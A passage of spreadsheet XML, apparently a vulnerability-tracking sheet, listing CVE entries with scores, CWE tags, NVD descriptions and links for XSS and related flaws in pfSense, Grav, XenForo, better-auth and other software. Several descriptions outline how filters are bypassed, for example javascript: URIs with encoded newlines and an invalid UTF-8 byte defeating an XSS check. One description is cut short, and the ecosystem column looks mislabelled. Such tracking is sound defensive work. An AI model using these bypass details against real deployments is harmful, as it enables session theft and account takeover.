      <c r="M2091" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48552</t>
        </is>
      </c>
    </row>
    <row r="2092">
      <c r="A2092" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2092" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56126</t>
        </is>
      </c>
      <c r="C2092" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2092" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2092" s="5" t="inlineStr"/>
      <c r="F2092" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2092" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2092" s="5" t="inlineStr"/>
      <c r="I2092" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2092" s="5" t="inlineStr"/>
      <c r="K2092" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2092" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Status: Monitoring privilege to inject arbitrary JavaScript via graph configuration parameters in /status_monitoring.php. Multiple POST parameters including graph-left, graph-right, time-period, resolution, start-date, end-date, start-time, end-time, graph-type, invert, and refresh-interval are concatenated and written to the global pfSense XML configuration without sanitization, then echoed unsanitized into a JavaScript string context on page render. Because the setting is stored in the global configuration, the payload executes in the browser of every user who visits the Status: Monitoring page.</t>
        </is>
      </c>
      <c r="M2092" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56126</t>
        </is>
      </c>
    </row>
    <row r="2093">
      <c r="A2093" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2093" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56127</t>
        </is>
      </c>
      <c r="C2093" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2093" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2093" s="5" t="inlineStr"/>
      <c r="F2093" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2093" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2093" s="5" t="inlineStr"/>
      <c r="I2093" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2093" s="5" t="inlineStr"/>
      <c r="K2093" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2093" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Rules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_rules_edit.php. The firewall rule description is stored in the pfSense XML configuration with only backslash-escaping applied and no HTML sanitization, then rendered without encoding in the firewall log table in /status_logs_filter.php. The payload executes in the browser of any user with the Status: Logs: Firewall privilege who views the affected log entries.</t>
        </is>
      </c>
      <c r="M2093" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56127</t>
        </is>
      </c>
    </row>
    <row r="2094">
      <c r="A2094" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2094" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56128</t>
        </is>
      </c>
      <c r="C2094" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2094" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2094" s="5" t="inlineStr"/>
      <c r="F2094" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2094" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2094" s="5" t="inlineStr"/>
      <c r="I2094" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2094" s="5" t="inlineStr"/>
      <c r="K2094" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2094" s="5" t="inlineStr">
        <is>
          <t>pfSense Plus before 26.07 and CE before 2.9.0 allow authenticated users with the Firewall: Schedules: Edit privilege to inject arbitrary JavaScript via the descr parameter in /firewall_schedule_edit.php. The schedule description is stored without HTML sanitization and subsequently inserted into an HTML attribute value in /firewall_rules.php with only single-quote escaping applied, permitting double-quote breakout. The payload executes in the browser of any user with the Firewall: Rules privilege who views the rules list with the affected schedule attached.</t>
        </is>
      </c>
      <c r="M2094" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56128</t>
        </is>
      </c>
    </row>
    <row r="2095">
      <c r="A2095" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2095" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63105</t>
        </is>
      </c>
      <c r="C2095" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2095" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2095" s="5" t="inlineStr"/>
      <c r="F2095" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2095" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2095" s="5" t="inlineStr"/>
      <c r="I2095" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J2095" s="5" t="inlineStr"/>
      <c r="K2095" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2095" s="5" t="inlineStr">
        <is>
          <t>ReadyEcommerce before 4.5.2 contains a stored cross-site scripting (XSS) vulnerability that allows authenticated customers to inject malicious HTML payloads through the chat and support ticket messaging systems by exploiting unsanitized rendering via the v-html directive in Messages.vue, RightChatSidebar.vue, SupportTicketMessages.vue, and SupportTicketDetails.vue. Attackers can submit crafted message content that executes arbitrary JavaScript in the browser of any shop owner or administrator who views the message, enabling session cookie theft and account takeover.</t>
        </is>
      </c>
      <c r="M2095" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63105</t>
        </is>
      </c>
    </row>
    <row r="2096">
      <c r="A2096" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2096" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63336</t>
        </is>
      </c>
      <c r="C2096" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2096" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2096" s="5" t="inlineStr"/>
      <c r="F2096" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2096" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2096" s="5" t="inlineStr"/>
      <c r="I2096" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2096" s="5" t="inlineStr"/>
      <c r="K2096" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2096" s="5" t="inlineStr">
        <is>
          <t>The RabbitMQ Java client library allows Java and JVM-based applications to connect to and interact with RabbitMQ nodes. Prior to 5.33.0, com.rabbitmq.client.ConnectionFactory.useSslProtocol() and ConnectionFactory.useSslProtocol(String) configure com.rabbitmq.client.TrustEverythingTrustManager and leave hostname verification disabled, causing arbitrary server certificates, including self-signed certificates, to be accepted. A network attacker able to intercept a TLS connection can impersonate the RabbitMQ broker, read protected AMQP traffic, and modify traffic without certificate or hostname validation. The fix changes the production TLS helpers to use the JVM default trust store and enables hostname verification, while retaining an explicitly named development-only no-verification helper. This issue is fixed in version 5.33.0.</t>
        </is>
      </c>
      <c r="M2096" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63336</t>
        </is>
      </c>
    </row>
    <row r="2097">
      <c r="A2097" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2097" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67196</t>
        </is>
      </c>
      <c r="C2097" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2097" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2097" s="5" t="inlineStr"/>
      <c r="F2097" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2097" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2097" s="5" t="inlineStr"/>
      <c r="I2097" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J2097" s="5" t="inlineStr"/>
      <c r="K2097" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2097" s="5" t="inlineStr">
        <is>
          <t>Perspective 5.0.0 contains a cross-site scripting vulnerability in the built-in Debug plugin that allows attackers to inject arbitrary HTML and JavaScript by writing table cell values containing unescaped HTML markup, which are interpolated directly into innerHTML during CSV serialization rendering. Attackers can craft table rows with payloads such as unquoted attribute injections containing event handler attributes that bypass RFC 4180 quoting, since angle brackets and event handler attributes are never escaped before assignment, causing malicious scripts to execute in the embedding page's origin.</t>
        </is>
      </c>
      <c r="M2097" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67196</t>
        </is>
      </c>
    </row>
    <row r="2098">
      <c r="A2098" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2098" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67333</t>
        </is>
      </c>
      <c r="C2098" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2098" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2098" s="5" t="inlineStr"/>
      <c r="F2098" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2098" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2098" s="5" t="inlineStr"/>
      <c r="I2098" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2098" s="5" t="inlineStr"/>
      <c r="K2098" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2098" s="5" t="inlineStr">
        <is>
          <t>better-auth before 1.6.13 (and pre-release builds 1.7.0-beta.0 through 1.7.0-beta.3) fail to validate the scheme of redirect_uris registered via the deprecated oidc-provider plugin and the mcp plugin (which wraps the same provider). An attacker can register an OAuth client with a javascript: redirect_uri, which the authorization server later returns unchanged in the consent response. If the deployment's consent page navigates the browser to the returned redirectURI (e.g. assigning it to window.location.href), the attacker's JavaScript executes in the authorization-server origin, exposing the victim's session and enabling account takeover.</t>
        </is>
      </c>
      <c r="M2098" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67333</t>
        </is>
      </c>
    </row>
    <row r="2099">
      <c r="A2099" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2099" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67338</t>
        </is>
      </c>
      <c r="C2099" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2099" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2099" s="5" t="inlineStr"/>
      <c r="F2099" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2099" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2099" s="5" t="inlineStr"/>
      <c r="I2099" s="5" t="inlineStr">
        <is>
          <t>2026-08-01</t>
        </is>
      </c>
      <c r="J2099" s="5" t="inlineStr"/>
      <c r="K2099" s="5" t="inlineStr">
        <is>
          <t>CWE-84</t>
        </is>
      </c>
      <c r="L2099" s="5" t="inlineStr">
        <is>
          <t>JupyterLab before 4.5.9 contains a stored cross-site scripting vulnerability in the Extension Manager that fails to validate URI protocols in package metadata URLs. Attackers can publish malicious PyPI packages with javascript: URLs in project metadata that execute arbitrary JavaScript in the JupyterLab origin when users click the extension name.</t>
        </is>
      </c>
      <c r="M2099" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67338</t>
        </is>
      </c>
    </row>
    <row r="2100">
      <c r="A2100" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2100" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71498</t>
        </is>
      </c>
      <c r="C2100" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2100" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2100" s="5" t="inlineStr"/>
      <c r="F2100" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2100" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2100" s="5" t="inlineStr"/>
      <c r="I2100" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J2100" s="5" t="inlineStr"/>
      <c r="K2100" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2100" s="5" t="inlineStr">
        <is>
          <t>node-re2 p</t>
        </is>
      </c>
      <c r="M2100" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71498</t>
        </is>
      </c>
    </row>
    <row r="2101">
      <c r="A2101" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2101" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71503</t>
        </is>
      </c>
      <c r="C2101" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2101" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2101" s="5" t="inlineStr"/>
      <c r="F2101" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2101" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2101" s="5" t="inlineStr"/>
      <c r="I2101" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J2101" s="5" t="inlineStr"/>
      <c r="K2101" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2101" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a reflected cross-site scripting vulnerability in the extra fields administration template where the type request parameter is echoed without JavaScript-context encoding into an inline script block and no Content-Security-Policy header is emitted. An unauthenticated attacker can cause an authenticated administrator to open a crafted URL to execute arbitrary JavaScript in that session and create a persistent administrator account.</t>
        </is>
      </c>
      <c r="M2101" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71503</t>
        </is>
      </c>
    </row>
    <row r="2102">
      <c r="A2102" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2102" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72747</t>
        </is>
      </c>
      <c r="C2102" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2102" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2102" s="5" t="inlineStr"/>
      <c r="F2102" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2102" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2102" s="5" t="inlineStr"/>
      <c r="I2102" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2102" s="5" t="inlineStr"/>
      <c r="K2102" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2102" s="5" t="inlineStr">
        <is>
          <t>AVideo fails to sanitize the phone field during user registration, allowing unauthenticated attackers to inject malicious JavaScript that persists in the database. When administrators visit the users management page, the unsanitized phone value is rendered via innerHTML, executing the injected script in the admin's browser session.</t>
        </is>
      </c>
      <c r="M2102" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72747</t>
        </is>
      </c>
    </row>
    <row r="2103">
      <c r="A2103" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2103" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73037</t>
        </is>
      </c>
      <c r="C2103" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2103" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2103" s="5" t="inlineStr"/>
      <c r="F2103" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2103" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2103" s="5" t="inlineStr"/>
      <c r="I2103" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2103" s="5" t="inlineStr"/>
      <c r="K2103" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2103" s="5" t="inlineStr">
        <is>
          <t>Next AI Draw.io 0.2.1 through 0.4.16 contains a reflected cross-site scripting vulnerability in the mcp query parameter that is interpolated without escaping into HTML and JavaScript. Attackers can craft malicious URLs to execute arbitrary JavaScript in the localhost origin, enabling exfiltration of diagram sessions and API data.</t>
        </is>
      </c>
      <c r="M2103" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73037</t>
        </is>
      </c>
    </row>
    <row r="2104">
      <c r="A2104" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73319</t>
        </is>
      </c>
      <c r="C2104" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2104" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2104" s="5" t="inlineStr"/>
      <c r="F2104" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2104" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2104" s="5" t="inlineStr"/>
      <c r="I2104" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2104" s="5" t="inlineStr"/>
      <c r="K2104" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2104" s="5" t="inlineStr">
        <is>
          <t>XenForo before 2.3.13 contains a cross-site scripting vulnerability in the dynamic redirect handler that allows unauthenticated attackers to execute arbitrary JavaScript in the board origin by crafting a malicious javascript: URI that bypasses host validation. Attackers can embed the board hostname in the URI authority component and use percent-encoded newlines to evade server-side filters, causing authenticated users who perform a Follow action to execute attacker-supplied JavaScript in their browser.</t>
        </is>
      </c>
      <c r="M2104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73319</t>
        </is>
      </c>
    </row>
    <row r="2105">
      <c r="A2105" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73409</t>
        </is>
      </c>
      <c r="C2105" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2105" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2105" s="5" t="inlineStr"/>
      <c r="F2105" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2105" s="5" t="inlineStr">
        <is>
          <t>oracle, mongodb</t>
        </is>
      </c>
      <c r="H2105" s="5" t="inlineStr"/>
      <c r="I2105" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2105" s="5" t="inlineStr"/>
      <c r="K2105" s="5" t="inlineStr">
        <is>
          <t>CWE-203</t>
        </is>
      </c>
      <c r="L2105" s="5" t="inlineStr">
        <is>
          <t>Budibase is an open-source low-code platform. Prior to 3.40.1, packages/server/src/integrations/mongodb.ts passed builder-controlled tlsCertificateKeyFile and tlsCAFile values directly to MongoClient on Budibase Cloud. A builder could submit absolute server paths through /api/datasources/verify and distinguish readable existing files from missing files by comparing the driver error, exposing a filesystem existence and readability oracle on the shared server. This issue is fixed in version 3.40.1.</t>
        </is>
      </c>
      <c r="M2105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73409</t>
        </is>
      </c>
    </row>
    <row r="2106">
      <c r="A2106" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75107</t>
        </is>
      </c>
      <c r="C2106" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2106" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2106" s="5" t="inlineStr"/>
      <c r="F2106" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2106" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2106" s="5" t="inlineStr"/>
      <c r="I2106" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2106" s="5" t="inlineStr"/>
      <c r="K2106" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2106" s="5" t="inlineStr">
        <is>
          <t>Grav Form Plugin before 9.1.19 fails to escape field-definition properties including prepend, append, spacer text, section text, and select option labels in form templates. Attackers with form authoring privileges can inject arbitrary HTML and JavaScript that executes for all form visitors through unescaped |raw filters and unquoted attributes.</t>
        </is>
      </c>
      <c r="M2106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75107</t>
        </is>
      </c>
    </row>
    <row r="2107">
      <c r="A2107" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75831</t>
        </is>
      </c>
      <c r="C2107" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2107" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2107" s="5" t="inlineStr"/>
      <c r="F2107" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2107" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2107" s="5" t="inlineStr"/>
      <c r="I2107" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2107" s="5" t="inlineStr"/>
      <c r="K2107" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2107" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.15 contains a stored cross-site scripting vulnerability in the audio and video media rendering through the sourceParsedownElement method. The media URL fragment is concatenated unescaped into rawHtml source elements, allowing attackers to inject arbitrary HTML and JavaScript that executes in viewers' sessions.</t>
        </is>
      </c>
      <c r="M2107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75831</t>
        </is>
      </c>
    </row>
    <row r="2108">
      <c r="A2108" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75834</t>
        </is>
      </c>
      <c r="C2108" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2108" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2108" s="5" t="inlineStr"/>
      <c r="F2108" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2108" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2108" s="5" t="inlineStr"/>
      <c r="I2108" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2108" s="5" t="inlineStr"/>
      <c r="K2108" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2108" s="5" t="inlineStr">
        <is>
          <t>Grav before 2.0.14 contains a stored cross-site scripting vulnerability in the Security::detectXss() function (system/src/Grav/Common/Security.php). All XSS detection patterns use the PCRE /u (UTF-8) modifier, so a single invalid UTF-8 byte anywhere in page content causes preg_match() to return false for every pattern, silently bypassing the save-time XSS safety gate (Validation::checkSafety()). An authenticated attacker with page-edit permissions (without the security.xss_whitelist privilege) can store malicious JavaScript that executes in the browser of a visitor who views the affected page.</t>
        </is>
      </c>
      <c r="M2108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75834</t>
        </is>
      </c>
    </row>
    <row r="2109">
      <c r="A2109" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81887</t>
        </is>
      </c>
      <c r="C2109" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2109" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2109" s="5" t="inlineStr"/>
      <c r="F2109" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G2109" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2109" s="5" t="inlineStr"/>
      <c r="I2109" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J2109" s="5" t="inlineStr"/>
      <c r="K2109" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-79</t>
        </is>
      </c>
      <c r="L2109" s="5" t="inlineStr">
        <is>
          <t>Livewire is a full-stack framework for Laravel. From 3.0.0-beta.1 until 3.8.3 and 4.3.4, the dot-notated query-string parser in js/plugins/history/index.js, including fromQueryString() and insertDotNotatedValueIntoData(), accepts the __proto__, constructor, and prototype path segments and creates inherited objects. Client-side state handlers then access effects.html, effects.js, effects.xjs, and effects.scripts without Object.prototype.hasOwnProperty.call(), allowing inherited attacker-controlled state to be treated as trusted effects. An unauthenticated attacker can craft a URL that, when opened by a user, executes arbitrary JavaScript in the affected application's origin. Exploitation requires user interaction and does not bypass server-side authorization or grant privileges beyond the affected user. This issue is fixed in versions 3.8.3 and 4.3.4.</t>
        </is>
      </c>
      <c r="M2109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81887</t>
        </is>
      </c>
    </row>
    <row r="2110">
      <c r="A2110" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82024</t>
        </is>
      </c>
      <c r="C2110" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2110" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2110" s="5" t="inlineStr"/>
      <c r="F2110" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2110" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H2110" s="5" t="inlineStr"/>
      <c r="I2110" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J2110" s="5" t="inlineStr"/>
      <c r="K2110" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L2110" s="5" t="inlineStr">
        <is>
          <t>LearnPress WordPress Plugin before 4.4.6 contains a stored cross-site scripting vulnerability that allows authenticated attackers with the Instructor role to inject persistent malicious payloads by submitting unsanitized input into quiz question answer title fields. Attackers can store arbitrary JavaScript through the answer title parameter, which is rendered through an unescaped HTML sink to execute in the browsers of any user who views the affected quiz question, including students, other instructors, and administrators.</t>
        </is>
      </c>
      <c r="M2110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82024</t>
        </is>
      </c>
    </row>
    <row r="2111">
      <c r="A2111" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B2111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82069</t>
        </is>
      </c>
      <c r="C2111" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="D2111" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E2111" s="5" t="inlineStr"/>
      <c r="F2111" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2111" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H2111" s="5" t="inlineStr"/>
      <c r="I2111" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2111" s="5" t="inlineStr"/>
      <c r="K2111" s="5" t="inlineStr">
        <is>
          <t>CWE-212</t>
        </is>
      </c>
      <c r="L2111" s="5" t="inlineStr">
        <is>
          <t>A security issue in MongoDB Server's query statistics serialization on the router allows users with monitoring privileges to access unredacted search query text from other users' operations. An improper conditional check in the serialization logic causes the data redaction mechanism to be bypassed when processing search queries through the sharded cluster router. This results in sensitive query literals being stored and made accessible through the query statistics interface.</t>
        </is>
      </c>
